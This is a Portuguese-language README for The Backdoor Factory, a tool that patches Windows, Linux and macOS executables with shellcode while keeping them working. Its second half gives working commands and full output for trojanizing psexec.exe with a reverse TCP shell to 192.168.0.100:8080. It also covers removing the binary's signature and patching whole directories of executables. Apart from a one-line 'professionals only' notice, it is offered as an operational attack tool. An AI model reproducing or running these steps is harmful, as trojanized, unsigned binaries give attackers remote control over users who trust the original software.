Aplique patch em binários PE, ELF, Mach-O com shellcode, nova versão em desenvolvimento, disponível apenas para patrocinadores
Apenas para profissionais de segurança e pesquisadores.
O objetivo do BDF é corrigir binários executáveis com shellcode desejado pelo usuário e continuar a execução normal do estado anterior à correção.
Black Hat USA 2015:
Vídeo: https://www.youtube.com/watch?v=OuyLzkG16Uk
Paper: https://www.blackhat.com/docs/us-15/materials/us-15-Pitts-Repurposing-OnionDuke-A-Single-Case-Study-Around-Reusing-Nation-State-Malware-wp.pdf
Shmoocon 2015:
Vídeo: https://archive.org/details/joshpitts_shmoocon2015
Paper: https://www.dropbox.com/s/te7e35c8xcnyfzb/JoshPitts-UserlandPersistenceOnMacOSX.pdf
DerbyCon 2014:
Vídeo: http://www.youtube.com/watch?v=LjUN9MACaTs
DerbyCon 2013:
Vídeo: http://www.youtube.com/watch?v=jXLb2RNX5xs
Demonstração do Módulo de Injeção: http://www.youtube.com/watch?v=04aJAex2o3U
Slides: http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
Contate o desenvolvedor em:
IRC:
irc.freenode.net #BDFactory
Twitter:
@midnite_runr
Sob uma Licença BSD 3 Cláusulas
Veja o wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki
docker pull secretsquirrel/the-backdoor-factory
docker run -it secretsquirrel/the-backdoor-factory bash
# ./backdoor.py
#####Para usar o OnionDuke você DEVE estar em uma máquina intel porque a aPLib ainda não tem suporte para chipset ARM.
O Capstone engine pode ser instalado a partir do PyPi com:
sudo pip install capstone
Pefile, mais recente:
https://code.google.com/p/pefile/
osslsigncode (incluído no repositório):
http://sourceforge.net/p/osslsigncode/osslsigncode/ci/master/tree/
Instalação no Kali:
apt-get update
apt-get install backdoor-factory
Instalação em outros *NIX/MAC:
./install.sh
Isso instalará o Capstone com 3.01 pip para instalar o pefile.
ATUALIZAÇÃO:
./update.sh
Suporte a:
Windows PE x86/x64, ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32),
e Mach-O x86/x64 e esses formatos em arquivos FAT
Arquivos Empacotados: PE UPX x86/x64
Experimental: OpenBSD x32
Alguns executáveis têm proteções internas, portanto, isso não funcionará em todos os binários. É aconselhável testar os binários alvo antes de implantá-los em clientes ou usá-los em exercícios. Estou perto de contornar o NSIS, portanto, contornar essas verificações será incluído no futuro.
Muitos agradecimentos a Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Sem ele, eu ainda estaria tentando fazer coisas estúpidas
com o formato elf.
Também agradecimentos a Silvio Cesare por seu artigo de 1998
(http://vxheaven.org/lib/vsc01.html) no qual essas técnicas de correção
de ELF são baseadas.
./backdoor.py -h Usage: backdoor.py [options]
Pode encontrar todos os codecaves em um EXE/DLL.
Por padrão, limpa o ponteiro para a tabela de certificados PE, removendo assim a assinatura de um binário.
Pode injetar shellcode em codecaves ou em uma nova seção.
Pode descobrir se um binário PE precisa ser executado com privilégios elevados.
Ao selecionar codecaves, você pode usar os seguintes comandos:
-Jump (j), para salto entre codecaves
-Single (s), para aplicar todo o shellcode em uma única cave
-Append (a), para criar um codecave
-Ignore (i ou q), ignorar, desconsiderar este binário
Pode ignorar DLLs
Correção da Tabela de Importação
Correção Automática (-m automatic)
Onionduke (-m onionduke)
Estende 1000 bytes (em bytes) ao SEGMENTO DE TEXTO e injeta shellcode nessa seção de código.
Correção na seção Pré-Text e remoção de assinatura
O usuário pode:
-Fornecer shellcode personalizado.
-Corrigir um diretório de executáveis/dlls.
-Selecionar apenas binários x32 ou x64 para corrigir.
-Incluir BDF em outros projetos Python, veja pebin.py e elfbin.py
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths: (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory